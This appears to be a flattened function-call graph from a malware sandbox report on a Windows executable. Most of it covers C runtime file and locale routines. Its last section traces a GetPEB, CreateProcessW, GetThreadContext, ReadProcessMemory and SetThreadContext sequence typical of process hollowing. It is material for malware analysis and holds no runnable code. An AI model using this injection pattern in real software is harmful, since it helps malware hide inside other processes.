__vswprintf_helper 66 API calls 7904 40a646 7901->7904 7905 40ad0e 7902->7905 7906 40a5b5 __tsopen_nolock 120 API calls 7903->7906 7908 4036b8 __vswprintf_helper 11 API calls 7904->7908 7909 4036b8 __vswprintf_helper 11 API calls 7905->7909 7910 40ad59 7906->7910 7911 40371d __chsize_nolock 66 API calls 7907->7911 7921 40a650 7908->7921 7915 40ad18 __tsopen_nolock 7909->7915 7912 40ad80 __wsopen_helper LeaveCriticalSection 7910->7912 7913 40a71e 7911->7913 7912->7915 7914 40370a __vswprintf_helper 66 API calls 7913->7914 7917 40a728 7914->7917 7915->7888 8008 409c3d 7916->8008 7919 4036b8 __vswprintf_helper 11 API calls 7917->7919 7919->7921 7920 40a7aa 7922 40a7b3 7920->7922 7923 40a7d4 CreateFileW 7920->7923 7921->7888 7924 40371d __chsize_nolock 66 API calls 7922->7924 7925 40a871 GetFileType 7923->7925 7926 40a801 7923->7926 7927 40a7b8 7924->7927 7928 40a8c2 7925->7928 7929 40a87e GetLastError 7925->7929 7930 40a83a GetLastError 7926->7930 7933 40a815 CreateFileW 7926->7933 7931 40370a __vswprintf_helper 66 API calls 7927->7931 8034 409a07 7928->8034 7932 403730 __dosmaperr 66 API calls 7929->7932 8029 403730 7930->8029 7935 40a7c2 7931->7935 7936 40a8a7 CloseHandle 7932->7936 7933->7925 7933->7930 7938 40370a __vswprintf_helper 66 API calls 7935->7938 7937 40a861 7936->7937 7939 40a8b5 7936->7939 7941 40370a __vswprintf_helper 66 API calls 7937->7941 7938->7921 7942 40370a __vswprintf_helper 66 API calls 7939->7942 7941->7943 7944 40a8ba 7942->7944 7943->7893 7944->7937 7945 40aaf7 7945->7943 7948 40ac5f CloseHandle CreateFileW 7945->7948 7951 40ab6b 7948->7951 7952 40ac8c GetLastError 7948->7952 7950 40a94e 7950->7945 7959 40ab00 7950->7959 7962 40a956 7950->7962 7971 40aa50 7950->7971 7951->7943 7955 403730 __dosmaperr 66 API calls 7952->7955 7953 40a962 8068 405090 7953->8068 7954 40a949 7956 40371d __chsize_nolock 66 API calls 7954->7956 7958 40ac98 7955->7958 7956->7950 8203 409a88 7958->8203 7959->7945 7970 40ab1d 7959->7970 7975 40aa74 7959->7975 8053 40e9e9 7962->8053 7963 40aac8 7967 405090 __read_nolock 76 API calls 7963->7967 7964 40a994 7966 405dc4 __lseek_nolock 68 API calls 7964->7966 7965 40a981 8137 40e833 7965->8137 7966->7950 7983 40aad5 7967->7983 7973 407626 __lseeki64_nolock 68 API calls 7970->7973 7971->7945 7971->7963 7971->7975 7976 40aa9f 7971->7976 7974 40ab28 7973->7974 7974->7975 7978 40ab33 7974->7978 7975->7945 7975->7962 8178 407e92 7975->8178 8168 407626 7976->8168 7986 407626 __lseeki64_nolock 68 API calls 7978->7986 7980 40ab78 7982 40ab9a 7980->7982 7984 40ab7f 7980->7984 7981 40ab5e 7988 40e9e9 __close_nolock 69 API calls 7981->7988 7987 405dc4 __lseek_nolock 68 API calls 7982->7987 7983->7945 7983->7962 7983->7980 7983->7981 7983->7982 7989 405dc4 __lseek_nolock 68 API calls 7984->7989 7991 40ab3d 7986->7991 7993 40ab42 7987->7993 7992 40ab65 7988->7992 7989->7993 7990 40aab1 7994 407626 __lseeki64_nolock 68 API calls 7990->7994 7991->7993 7995 40370a __vswprintf_helper 66 API calls 7992->7995 7993->7945 7993->7962 7996 40aabb 7994->7996 7995->7951 7996->7962 7996->7963 7998 40ad85 7997->7998 7999 40adac 7997->7999 8326 409c16 LeaveCriticalSection 7998->8326 7999->7887 8002 40ec10 8001->8002 8003 40ec25 8001->8003 8004 40370a __vswprintf_helper 66 API calls 8002->8004 8003->7898 8005 40ec15 8004->8005 8006 4036b8 __vswprintf_helper 11 API calls 8005->8006 8007 40ec20 8006->8007 8007->7898 8009 409c49 __tsopen_nolock 8008->8009 8010 40a295 __mtinitlocknum 66 API calls 8009->8010 8011 409c59 8010->8011 8012 40a357 __lock 66 API calls 8011->8012 8013 409c5e __tsopen_nolock 8011->8013 8017 409c6d 8012->8017 8013->7920 8015 409d45 8016 408c3f __calloc_crt 66 API calls 8015->8016 8019 409d4e 8016->8019 8017->8015 8018 40a357 __lock 66 API calls 8017->8018 8020 409ced EnterCriticalSection 8017->8020 8022 409cc3 InitializeCriticalSectionAndSpinCount 8017->8022 8025 409daf 8017->8025 8212 409d0f 8017->8212 8018->8017 8019->8025 8215 409b77 8019->8215 8020->8017 8021 409cfd LeaveCriticalSection 8020->8021 8021->8017 8022->8017 8225 409dcd 8025->8225 8027 407230 __getptd_noexit 66 API calls 8026->8027 8028 403722 8027->8028 8028->7901 8030 40371d __chsize_nolock 66 API calls 8029->8030 8031 40373b __dosmaperr 8030->8031 8032 40370a __vswprintf_helper 66 API calls 8031->8032 8033 40374e 8032->8033 8033->7937 8035 409a15 8034->8035 8036 409a6e 8034->8036 8035->8036 8041 409a39 8035->8041 8037 40370a __vswprintf_helper 66 API calls 8036->8037 8038 409a73 8037->8038 8040 40371d __chsize_nolock 66 API calls 8038->8040 8039 409a64 8039->7945 8039->7950 8043 405dc4 8039->8043 8040->8039 8041->8039 8042 409a5e SetStdHandle 8041->8042 8042->8039 8233 409b0e 8043->8233 8045 405dd3 8046 405de9 SetFilePointer 8045->8046 8047 405dd9 8045->8047 8048 405e00 GetLastError 8046->8048 8050 405e08 8046->8050 8049 40370a __vswprintf_helper 66 API calls 8047->8049 8048->8050 8052 405dde 8049->8052 8051 403730 __dosmaperr 66 API calls 8050->8051 8050->8052 8051->8052 8052->7953 8052->7954 8054 409b0e __chsize_nolock 66 API calls 8053->8054 8055 40e9f9 8054->8055 8056 40ea4f 8055->8056 8059 409b0e __chsize_nolock 66 API calls 8055->8059 8067 40ea2d 8055->8067 8057 409a88 __free_osfhnd 67 API calls 8056->8057 8058 40ea57 8057->8058 8061 40ea79 8058->8061 8064 403730 __dosmaperr 66 API calls 8058->8064 8062 40ea24 8059->8062 8060 409b0e __chsize_nolock 66 API calls 8063 40ea39 CloseHandle 8060->8063 8061->7944 8065 409b0e __chsize_nolock 66 API calls 8062->8065 8063->8056 8066 40ea45 GetLastError 8063->8066 8064->8061 8065->8067 8066->8056 8067->8056 8067->8060 8069 4050c7 8068->8069 8070 4050ac 8068->8070 8071 4050d6 8069->8071 8073 4050f5 8069->8073 8072 40371d __chsize_nolock 66 API calls 8070->8072 8074 40371d __chsize_nolock 66 API calls 8071->8074 8075 4050b1 8072->8075 8077 405113 8073->8077 8089 405127 8073->8089 8076 4050db 8074->8076 8078 40370a __vswprintf_helper 66 API calls 8075->8078 8080 40370a __vswprintf_helper 66 API calls 8076->8080 8081 40371d __chsize_nolock 66 API calls 8077->8081 8082 4050b9 8078->8082 8079 40517d 8084 40371d __chsize_nolock 66 API calls 8079->8084 8083 4050e2 8080->8083 8085 405118 8081->8085 8082->7964 8082->7965 8086 4036b8 __vswprintf_helper 11 API calls 8083->8086 8087 405182 8084->8087 8088 40370a __vswprintf_helper 66 API calls 8085->8088 8086->8082 8090 40370a __vswprintf_helper 66 API calls 8087->8090 8091 40511f 8088->8091 8089->8079 8089->8082 8092 40515c 8089->8092 8094 405196 8089->8094 8090->8091 8093 4036b8 __vswprintf_helper 11 API calls 8091->8093 8092->8079 8096 405167 ReadFile 8092->8096 8093->8082 8097 408bfa __malloc_crt 66 API calls 8094->8097 8099 405292 8096->8099 8100 40560a GetLastError 8096->8100 8098 4051ac 8097->8098 8103 4051d4 8098->8103 8104 4051b6 8098->8104 8099->8100 8107 4052a6 8099->8107 8101 405617 8100->8101 8102 405491 8100->8102 8105 40370a __vswprintf_helper 66 API calls 8101->8105 8111 403730 __dosmaperr 66 API calls 8102->8111 8116 405416 8102->8116 8108 407626 __lseeki64_nolock 68 API calls 8103->8108 8106 40370a __vswprintf_helper 66 API calls 8104->8106 8109 40561c 8105->8109 8110 4051bb 8106->8110 8107->8116 8118 4052c2 8107->8118 8120 4054d6 8107->8120 8112 4051e2 8108->8112 8113 40371d __chsize_nolock 66 API calls 8109->8113 8114 40371d __chsize_nolock 66 API calls 8110->8114 8111->8116 8112->8096 8113->8116 8114->8082 8115 408bc0 _free 66 API calls 8115->8082 8116->8082 8116->8115 8117 405326 ReadFile 8123 405344 GetLastError 8117->8123 8128 40534e 8117->8128 8118->8117 8125 4053a3 8118->8125 8119 40554b ReadFile 8121 40556a GetLastError 8119->8121 8129 405574 8119->8129 8120->8116 8120->8119 8121->8120 8121->8129 8122 405467 MultiByteToWideChar 8122->8116 8124 40548b GetLastError 8122->8124 8123->8118 8123->8128 8124->8102 8125->8116 8126 405411 8125->8126 8127 40541e 8125->8127 8133 4053db 8125->8133 8130 40370a __vswprintf_helper 66 API calls 8126->8130 8127->8133 8134 405455 8127->8134 8128->8118 8131 407626 __lseeki64_nolock 68 API calls 8128->8131 8129->8120 8132 407626 __lseeki64_nolock 68 API calls 8129->8132 8130->8116 8131->8128 8132->8129 8133->8122 8135 407626 __lseeki64_nolock 68 API calls 8134->8135 8136 405464 8135->8136 8136->8122 8138 407626 __lseeki64_nolock 68 API calls 8137->8138 8139 40e852 8138->8139 8140 40e8b5 8139->8140 8141 407626 __lseeki64_nolock 68 API calls 8139->8141 8142 40370a __vswprintf_helper 66 API calls 8140->8142 8143 40a98d 8140->8143 8146 40e86e 8141->8146 8142->8143 8143->7962 8143->7964 8144 40e950 8147 40e9b9 8144->8147 8151 407626 __lseeki64_nolock 68 API calls 8144->8151 8145 40e894 GetProcessHeap HeapAlloc 8148 40e8b0 8145->8148 8158 40e8c7 __setmode_nolock 8145->8158 8146->8140 8146->8144 8146->8145 8147->8140 8149 407626 __lseeki64_nolock 68 API calls 8147->8149 8150 40370a __vswprintf_helper 66 API calls 8148->8150 8149->8140 8150->8140 8152 40e969 8151->8152 8152->8140 8153 409b0e __chsize_nolock 66 API calls 8152->8153 8154 40e97f SetEndOfFile 8153->8154 8154->8147 8155 40e99c 8154->8155 8157 40370a __vswprintf_helper 66 API calls 8155->8157 8159 40e9a1 8157->8159 8160 40e933 8158->8160 8167 40e90a __setmode_nolock 8158->8167 8246 407795 8158->8246 8162 40371d __chsize_nolock 66 API calls 8159->8162 8161 40371d __chsize_nolock 66 API calls 8160->8161 8163 40e938 8161->8163 8164 40e9ac GetLastError 8162->8164 8165 40370a __vswprintf_helper 66 API calls 8163->8165 8163->8167 8164->8147 8165->8167 8166 40e918 GetProcessHeap HeapFree 8166->8147 8167->8166 8169 409b0e __chsize_nolock 66 API calls 8168->8169 8170 407644 8169->8170 8171 40764c 8170->8171 8172 40765d SetFilePointer 8170->8172 8173 40370a __vswprintf_helper 66 API calls 8171->8173 8174 407675 GetLastError 8172->8174 8175 407651 8172->8175 8173->8175 8174->8175 8176 40767f 8174->8176 8175->7975 8175->7990 8177 403730 __dosmaperr 66 API calls 8176->8177 8177->8175 8179 407e9e __tsopen_nolock 8178->8179 8180 407ea6 8179->8180 8181 407ec1 8179->8181 8183 40371d __chsize_nolock 66 API calls 8180->8183 8182 407ecd 8181->8182 8187 407f07 8181->8187 8184 40371d __chsize_nolock 66 API calls 8182->8184 8185 407eab 8183->8185 8186 407ed2 8184->8186 8188 40370a __vswprintf_helper 66 API calls 8185->8188 8189 40370a __vswprintf_helper 66 API calls 8186->8189 8190 409b77 ___lock_fhandle 68 API calls 8187->8190 8197 407eb3 __tsopen_nolock 8188->8197 8191 407eda 8189->8191 8192 407f0d 8190->8192 8193 4036b8 __vswprintf_helper 11 API calls 8191->8193 8194 407f1b 8192->8194 8195 407f2f 8192->8195 8193->8197 8198 407795 __write_nolock 94 API calls 8194->8198 8196 40370a __vswprintf_helper 66 API calls 8195->8196 8199 407f34 8196->8199 8197->7975 8200 407f27 8198->8200 8201 40371d __chsize_nolock 66 API calls 8199->8201 8322 407f5e 8200->8322 8201->8200 8204 409af4 8203->8204 8205 409a99 8203->8205 8206 40370a __vswprintf_helper 66 API calls 8204->8206 8205->8204 8209 409ac4 8205->8209 8207 409af9 8206->8207 8208 40371d __chsize_nolock 66 API calls 8207->8208 8210 409aea 8208->8210 8209->8210 8211 409ae4 SetStdHandle 8209->8211 8210->7951 8211->8210 8228 40a27e LeaveCriticalSection 8212->8228 8214 409d16 8214->8017 8216 409b83 __tsopen_nolock 8215->8216 8217 409bdd 8216->8217 8220 40a357 __lock 66 API calls 8216->8220 8218 409be2 EnterCriticalSection 8217->8218 8219 409bff __tsopen_nolock 8217->8219 8218->8219 8219->8025 8221 409baf 8220->8221 8222 409bcb 8221->8222 8223 409bb8 InitializeCriticalSectionAndSpinCount 8221->8223 8229 409c0d 8222->8229 8223->8222 8232 40a27e LeaveCriticalSection 8225->8232 8227 409dd4 8227->8013 8228->8214 8230 40a27e _doexit LeaveCriticalSection 8229->8230 8231 409c14 8230->8231 8231->8217 8232->8227 8234 409b1b 8233->8234 8236 409b33 8233->8236 8235 40371d __chsize_nolock 66 API calls 8234->8235 8237 409b20 8235->8237 8238 40371d __chsize_nolock 66 API calls 8236->8238 8239 409b72 8236->8239 8240 40370a __vswprintf_helper 66 API calls 8237->8240 8241 409b44 8238->8241 8239->8045 8242 409b28 8240->8242 8243 40370a __vswprintf_helper 66 API calls 8241->8243 8242->8045 8244 409b4c 8243->8244 8245 4036b8 __vswprintf_helper 11 API calls 8244->8245 8245->8242 8247 4077a4 __write_nolock 8246->8247 8248 4077f9 8247->8248 8249 4077da 8247->8249 8279 4077cf 8247->8279 8254 407855 8248->8254 8255 407838 8248->8255 8250 40371d __chsize_nolock 66 API calls 8249->8250 8252 4077df 8250->8252 8251 40800d __atodbl_l 5 API calls 8253 407e90 8251->8253 8257 40370a __vswprintf_helper 66 API calls 8252->8257 8253->8158 8256 407868 8254->8256 8259 407626 __lseeki64_nolock 68 API calls 8254->8259 8258 40371d __chsize_nolock 66 API calls 8255->8258 8305 407faf 8256->8305 8260 4077e6 8257->8260 8262 40783d 8258->8262 8259->8256 8263 4036b8 __vswprintf_helper 11 API calls 8260->8263 8265 40370a __vswprintf_helper 66 API calls 8262->8265 8263->8279 8264 407871 8266 407b13 8264->8266 8314 4072a9 8264->8314 8267 407845 8265->8267 8269 407b22 8266->8269 8270 407dc3 WriteFile 8266->8270 8268 4036b8 __vswprintf_helper 11 API calls 8267->8268 8268->8279 8272 407bdd 8269->8272 8281 407b35 8269->8281 8274 407af5 8270->8274 8275 407df6 GetLastError 8270->8275 8287 407bea 8272->8287 8296 407cb7 8272->8296 8276 407e41 8274->8276 8274->8279 8280 407e14 8274->8280 8275->8274 8276->8279 8283 40370a __vswprintf_helper 66 API calls 8276->8283 8277 4078b5 8277->8266 8278 4078c5 GetConsoleCP 8277->8278 8278->8274 8302 4078e8 8278->8302 8279->8251 8285 407e33 8280->8285 8286 407e1f 8280->8286 8281->8274 8281->8276 8282 407b7f WriteFile 8281->8282 8282->8275 8282->8281 8289 407e64 8283->8289 8284 407d28 WideCharToMultiByte 8284->8275 8291 407d5f WriteFile 8284->8291 8292 403730 __dosmaperr 66 API calls 8285->8292 8290 40370a __vswprintf_helper 66 API calls 8286->8290 8287->8274 8287->8276 8288 407c59 WriteFile 8287->8288 8288->8275 8288->8287 8293 40371d __chsize_nolock 66 API calls 8289->8293 8294 407e24 8290->8294 8295 407d96 GetLastError 8291->8295 8291->8296 8292->8279 8293->8279 8298 40371d __chsize_nolock 66 API calls 8294->8298 8295->8296 8296->8274 8296->8276 8296->8284 8296->8291 8298->8279 8299 407994 WideCharToMultiByte 8299->8274 8301 4079c5 WriteFile 8299->8301 8300 408e91 78 API calls __fassign 8300->8302 8301->8275 8301->8302 8302->8274 8302->8275 8302->8299 8302->8300 8303 40b810 WriteConsoleW CreateFileW __write_nolock 8302->8303 8304 407a19 WriteFile 8302->8304 8319 408ee3 8302->8319 8303->8302 8304->8275 8304->8302 8306 407fcb 8305->8306 8307 407fbc 8305->8307 8310 407fe9 8306->8310 8311 40370a __vswprintf_helper 66 API calls 8306->8311 8308 40370a __vswprintf_helper 66 API calls 8307->8308 8309 407fc1 8308->8309 8309->8264 8310->8264 8312 407fdc 8311->8312 8313 4036b8 __vswprintf_helper 11 API calls 8312->8313 8313->8309 8315 407230 __getptd_noexit 66 API calls 8314->8315 8316 4072b1 8315->8316 8317 4072be GetConsoleMode 8316->8317 8318 4069b9 __amsg_exit 66 API calls 8316->8318 8317->8266 8317->8277 8318->8317 8320 408eab __isleadbyte_l 76 API calls 8319->8320 8321 408ef2 8320->8321 8321->8302 8325 409c16 LeaveCriticalSection 8322->8325 8324 407f64 8324->8197 8325->8324 8326->7999 8328 40ade3 8327->8328 8336 40adfa 8327->8336 8329 40adea 8328->8329 8331 40ae0b 8328->8331 8330 40370a __vswprintf_helper 66 API calls 8329->8330 8332 40adef 8330->8332 8338 403753 8331->8338 8334 4036b8 __vswprintf_helper 11 API calls 8332->8334 8334->8336 8335 40ec31 78 API calls __towlower_l 8337 40ae17 8335->8337 8336->7877 8337->8335 8337->8336 8339 403766 8338->8339 8340 4037b3 8338->8340 8341 4072a9 __getptd 66 API calls 8339->8341 8340->8337 8342 40376b 8341->8342 8344 403793 8342->8344 8346 4089c0 8342->8346 8344->8340 8361 40823f 8344->8361 8347 4089cc __tsopen_nolock 8346->8347 8348 4072a9 __getptd 66 API calls 8347->8348 8349 4089d1 8348->8349 8350 4089ff 8349->8350 8352 4089e3 8349->8352 8351 40a357 __lock 66 API calls 8350->8351 8353 408a06 8351->8353 8354 4072a9 __getptd 66 API calls 8352->8354 8377 408973 8353->8377 8358 4089e8 8354->8358 8359 4069b9 __amsg_exit 66 API calls 8358->8359 8360 4089f6 __tsopen_nolock 8358->8360 8359->8360 8360->8344 8362 40824b __tsopen_nolock 8361->8362 8363 4072a9 __getptd 66 API calls 8362->8363 8364 408250 8363->8364 8365 40a357 __lock 66 API calls 8364->8365 8366 408262 8364->8366 8367 408280 8365->8367 8369 408270 __tsopen_nolock 8366->8369 8373 4069b9 __amsg_exit 66 API calls 8366->8373 8368 4082c9 8367->8368 8370 4082b1 InterlockedIncrement 8367->8370 8371 408297 InterlockedDecrement 8367->8371 8433 4082da 8368->8433 8369->8340 8370->8368 8371->8370 8374 4082a2 8371->8374 8373->8369 8374->8370 8375 408bc0 _free 66 API calls 8374->8375 8376 4082b0 8375->8376 8376->8370 8378 408980 8377->8378 8379 4089b5 8377->8379 8378->8379 8380 408700 ___addlocaleref 8 API calls 8378->8380 8385 408a2d 8379->8385 8381 408996 8380->8381 8381->8379 8388 40878f 8381->8388 8432 40a27e LeaveCriticalSection 8385->8432 8387 408a34 8387->8358 8389 4087a0 InterlockedDecrement 8388->8389 8390 408823 8388->8390 8391 4087b5 InterlockedDecrement 8389->8391 8392 4087b8 8389->8392 8390->8379 8402 408828 8390->8402 8391->8392 8393 4087c2 InterlockedDecrement 8392->8393 8394 4087c5 8392->8394 8393->8394 8395 4087d2 8394->8395 8396 4087cf InterlockedDecrement 8394->8396 8397 4087dc InterlockedDecrement 8395->8397 8399 4087df 8395->8399 8396->8395 8397->8399 8398 4087f8 InterlockedDecrement 8398->8399 8399->8398 8400 408808 InterlockedDecrement 8399->8400 8401 408813 InterlockedDecrement 8399->8401 8400->8399 8401->8390 8408 40883f 8402->8408 8431 4088ac 8402->8431 8403 4088f9 8406 40bd05 ___free_lc_time 66 API calls 8403->8406 8422 408922 8403->8422 8404 408bc0 _free 66 API calls 8405 4088cd 8404->8405 8409 408bc0 _free 66 API calls 8405->8409 8411 408917 8406->8411 8407 408873 8410 408894 8407->8410 8421 408bc0 _free 66 API calls 8407->8421 8408->8407 8416 408bc0 _free 66 API calls 8408->8416 8408->8431 8412 4088e0 8409->8412 8413 408bc0 _free 66 API calls 8410->8413 8415 408bc0 _free 66 API calls 8411->8415 8419 408bc0 _free 66 API calls 8412->8419 8423 4088a1 8413->8423 8414 408967 8417 408bc0 _free 66 API calls 8414->8417 8415->8422 8418 408868 8416->8418 8424 40896d 8417->8424 8425 40c0e5 ___free_lconv_mon 66 API calls 8418->8425 8426 4088ee 8419->8426 8420 408bc0 66 API calls _free 8420->8422 8427 408889 8421->8427 8422->8414 8422->8420 8428 408bc0 _free 66 API calls 8423->8428 8424->8379 8425->8407 8429 408bc0 _free 66 API calls 8426->8429 8430 40c07c ___free_lconv_num 66 API calls 8427->8430 8428->8431 8429->8403 8430->8410 8431->8403 8431->8404 8432->8387 8436 40a27e LeaveCriticalSection 8433->8436 8435 4082e1 8435->8366 8436->8435 8438 405952 LeaveCriticalSection 8437->8438 8439 405933 8437->8439 8438->7852 8439->8438 8440 40593a 8439->8440 8443 40a27e LeaveCriticalSection 8440->8443 8442 40594f 8442->7852 8443->8442 8445 4058c1 8444->8445 8446 4058e3 EnterCriticalSection 8444->8446 8445->8446 8448 4058c9 8445->8448 8447 40309b 8446->8447 8450 402fcb 8447->8450 8449 40a357 __lock 66 API calls 8448->8449 8449->8447 8451 402feb 8450->8451 8452 402fdb 8450->8452 8454 402ffd 8451->8454 8503 402dd2 8451->8503 8453 40370a __vswprintf_helper 66 API calls 8452->8453 8455 402fe0 8453->8455 8465 405f0d 8454->8465 8462 4030c7 8455->8462 8460 40303d 8478 405e39 8460->8478 8463 405922 __wfsopen 2 API calls 8462->8463 8464 4030cf 8463->8464 8464->7681 8466 405f26 8465->8466 8470 40300b 8465->8470 8467 40573d __flush 66 API calls 8466->8467 8466->8470 8468 405f41 8467->8468 8469 407e92 __write 97 API calls 8468->8469 8469->8470 8471 40573d 8470->8471 8472 405749 8471->8472 8473 40575e 8471->8473 8474 40370a __vswprintf_helper 66 API calls 8472->8474 8473->8460 8475 40574e 8474->8475 8476 4036b8 __vswprintf_helper 11 API calls 8475->8476 8477 405759 8476->8477 8477->8460 8479 405e45 __tsopen_nolock 8478->8479 8480 405e68 8479->8480 8481 405e4d 8479->8481 8483 405e74 8480->8483 8486 405eae 8480->8486 8482 40371d __chsize_nolock 66 API calls 8481->8482 8484 405e52 8482->8484 8485 40371d __chsize_nolock 66 API calls 8483->8485 8487 40370a __vswprintf_helper 66 API calls 8484->8487 8488 405e79 8485->8488 8489 409b77 ___lock_fhandle 68 API calls 8486->8489 8490 405e5a __tsopen_nolock 8487->8490 8491 40370a __vswprintf_helper 66 API calls 8488->8491 8493 405eb4 8489->8493 8490->8455 8492 405e81 8491->8492 8494 4036b8 __vswprintf_helper 11 API calls 8492->8494 8495 405ec2 8493->8495 8496 405ed6 8493->8496 8494->8490 8497 405dc4 __lseek_nolock 68 API calls 8495->8497 8498 40370a __vswprintf_helper 66 API calls 8496->8498 8502 405ece 8497->8502 8499 405edb 8498->8499 8500 40371d __chsize_nolock 66 API calls 8499->8500 8500->8502 8520 405f05 8502->8520 8504 402de5 8503->8504 8505 402dfd 8503->8505 8506 40370a __vswprintf_helper 66 API calls 8504->8506 8507 40573d __flush 66 API calls 8505->8507 8508 402dea 8506->8508 8509 402e04 8507->8509 8510 4036b8 __vswprintf_helper 11 API calls 8508->8510 8511 405e39 __write 71 API calls 8509->8511 8519 402df5 8510->8519 8512 402e1b 8511->8512 8513 402e8d 8512->8513 8515 402e4d 8512->8515 8512->8519 8514 40370a __vswprintf_helper 66 API calls 8513->8514 8514->8519 8516 405e39 __write 71 API calls 8515->8516 8515->8519 8517 402ee8 8516->8517 8518 405e39 __write 71 API calls 8517->8518 8517->8519 8518->8519 8519->8454 8523 409c16 LeaveCriticalSection 8520->8523 8522 405f0b 8522->8490 8523->8522 8525 405922 __wfsopen 2 API calls 8524->8525 8526 402fc9 8525->8526 8526->7694 8528 402d33 __tsopen_nolock 8527->8528 8529 402d6c __tsopen_nolock 8528->8529 8530 402d74 8528->8530 8531 402d47 _memset 8528->8531 8529->7697 8532 4058af __lock_file 67 API calls 8530->8532 8534 40370a __vswprintf_helper 66 API calls 8531->8534 8533 402d7c 8532->8533 8540 402b6b 8533->8540 8536 402d61 8534->8536 8538 4036b8 __vswprintf_helper 11 API calls 8536->8538 8538->8529 8543 402b89 _memset 8540->8543 8547 402ba3 8540->8547 8541 402b93 8542 40370a __vswprintf_helper 66 API calls 8541->8542 8544 402b98 8542->8544 8543->8541 8543->8547 8551 402bde 8543->8551 8545 4036b8 __vswprintf_helper 11 API calls 8544->8545 8545->8547 8554 402dab 8547->8554 8548 402ce9 _memset 8552 40370a __vswprintf_helper 66 API calls 8548->8552 8549 40573d __flush 66 API calls 8549->8551 8551->8547 8551->8548 8551->8549 8557 405647 8551->8557 8587 404f6e 8551->8587 8607 405763 8551->8607 8552->8544 8555 405922 __wfsopen 2 API calls 8554->8555 8556 402db3 8555->8556 8556->8529 8558 405653 __tsopen_nolock 8557->8558 8559 405676 8558->8559 8560 40565b 8558->8560 8562 405682 8559->8562 8566 4056bc 8559->8566 8561 40371d __chsize_nolock 66 API calls 8560->8561 8564 405660 8561->8564 8563 40371d __chsize_nolock 66 API calls 8562->8563 8565 405687 8563->8565 8567 40370a __vswprintf_helper 66 API calls 8564->8567 8568 40370a __vswprintf_helper 66 API calls 8565->8568 8569 4056c9 8566->8569 8570 4056de 8566->8570 8580 405668 __tsopen_nolock 8567->8580 8572 40568f 8568->8572 8573 40371d __chsize_nolock 66 API calls 8569->8573 8571 409b77 ___lock_fhandle 68 API calls 8570->8571 8574 4056e4 8571->8574 8578 4036b8 __vswprintf_helper 11 API calls 8572->8578 8575 4056ce 8573->8575 8576 4056f2 8574->8576 8577 405706 8574->8577 8579 40370a __vswprintf_helper 66 API calls 8575->8579 8581 405090 __read_nolock 76 API calls 8576->8581 8582 40370a __vswprintf_helper 66 API calls 8577->8582 8578->8580 8579->8572 8580->8551 8583 4056fe 8581->8583 8584 40570b 8582->8584 8616 405735 8583->8616 8585 40371d __chsize_nolock 66 API calls 8584->8585 8585->8583 8588 404f7b 8587->8588 8592 404f90 8587->8592 8589 40370a __vswprintf_helper 66 API calls 8588->8589 8590 404f80 8589->8590 8591 4036b8 __vswprintf_helper 11 API calls 8590->8591 8599 404f8b 8591->8599 8593 404fc5 8592->8593 8592->8599 8620 407f66 8592->8620 8595 40573d __flush 66 API calls 8593->8595 8596 404fd9 8595->8596 8597 405647 __read 79 API calls 8596->8597 8598 404fe0 8597->8598 8598->8599 8600 40573d __flush 66 API calls 8598->8600 8599->8551 8601 405003 8600->8601 8601->8599 8602 40573d __flush 66 API calls 8601->8602 8603 40500f 8602->8603 8603->8599 8604 40573d __flush 66 API calls 8603->8604 8605 40501c 8604->8605 8606 40573d __flush 66 API calls 8605->8606 8606->8599 8610 405774 _memset 8607->8610 8612 405770 _memmove 8607->8612 8608 40577a 8609 40370a __vswprintf_helper 66 API calls 8608->8609 8611 40577f 8609->8611 8610->8608 8610->8612 8613 4057bf 8610->8613 8614 4036b8 __vswprintf_helper 11 API calls 8611->8614 8612->8551 8613->8612 8615 40370a __vswprintf_helper 66 API calls 8613->8615 8614->8612 8615->8611 8619 409c16 LeaveCriticalSection 8616->8619 8618 40573b 8618->8580 8619->8618 8621 408bfa __malloc_crt 66 API calls 8620->8621 8622 407f7b 8621->8622 8622->8593 8638 48005f GetPEB 8623->8638 8625 4808fd 8626 480a98 8625->8626 8627 480aa6 CreateProcessW 8625->8627 8631 480ad0 8625->8631 8633 481b9c 11 API calls 8625->8633 8635 480d5a SetThreadContext 8625->8635 8637 4819ed 11 API calls 8625->8637 8639 481a82 8625->8639 8648 48183b 8625->8648 8657 48193c 8625->8657 8626->7701 8628 480ad5 GetThreadContext 8627->8628 8627->8631 8629 480af5 ReadProcessMemory 8628->8629 8628->8631 8629->8625 8629->8631 8631->8626 8666 4819ed 8631->8666 8633->8625 8635->8625 8635->8631 8637->8625 8638->8625 8640 481a9d 8639->8640 8675 48013e GetPEB 8640->8675 8642 481abe 8643 481b76 8642->8643 8644 481ac6 8642->8644 8692 481ec8 8643->8692 8677 48163c 8644->8677 8647 481b5d 8647->8625 8649 481856 8648->8649 8650 48013e GetPEB 8649->8650 8651 481877 8650->8651 8652 481909 8651->8652 8653 48187f 8651->8653 8702 481eec 8652->8702 8654 48163c 10 API calls 8653->8654 8656 4818f0 8654->8656 8656->8625 8658 481957 8657->8658 8659 48013e GetPEB 8658->8659 8660 481978 8659->8660 8661 48197c 8660->8661 8662 4819c2 8660->8662 8663 48163c 10 API calls 8661->8663 8705 481efe 8662->8705 8665 4819b7 8663->8665 8665->8625 8667 481a00 8666->8667 8668 48013e GetPEB 8667->8668 8669 481a21 8668->8669 8670 481a6b 8669->8670 8671 481a25 8669->8671 8708 481eb6 8670->8708 8672 48163c 10 API calls 8671->8672 8674 481a60 8672->8674 8674->8626 8676 480160 8675->8676 8676->8642 8695 48005f GetPEB 8677->8695 8679 481685 8696 480109 GetPEB 8679->8696 8682 481712 8683 481723 VirtualAlloc 8682->8683 8687 4817e7 8682->8687 8684 481739 ReadFile 8683->8684 8683->8687 8685 48174e VirtualAlloc 8684->8685 8684->8687 8686 48176f 8685->8686 8685->8687 8686->8687 8690 4817da VirtualFree 8686->8690 8691 4817d6 FindCloseChangeNotification 8686->8691 8688 481830 8687->8688 8689 481825 VirtualFree 8687->8689 8688->8647 8689->8688 8690->8687 8691->8690 8693 48163c 10 API calls 8692->8693 8694 481ed2 8693->8694 8694->8647 8695->8679 8697 48011c 8696->8697 8699 480131 CreateFileW 8697->8699 8700 48017b GetPEB 8697->8700 8699->8682 8699->8687 8701 48019f 8700->8701 8701->8697 8703 48163c 10 API calls 8702->8703 8704 481ef6 8703->8704 8704->8656 8706 48163c 10 API calls 8705->8706 8707 481f08 8706->8707 8707->8665 8709 48163c 10 API calls 8708->8709 8710 481ec0 8709->8710 8710->8674 8711->7705 8737 48005f GetPEB 8712->8737 8714 480f31 8738 48005f GetPEB 8714->8738 8716 480f44 8739 48005f GetPEB 8716->8739 8718 480f57 8740 480ebf 8718->8740 8720 480f65 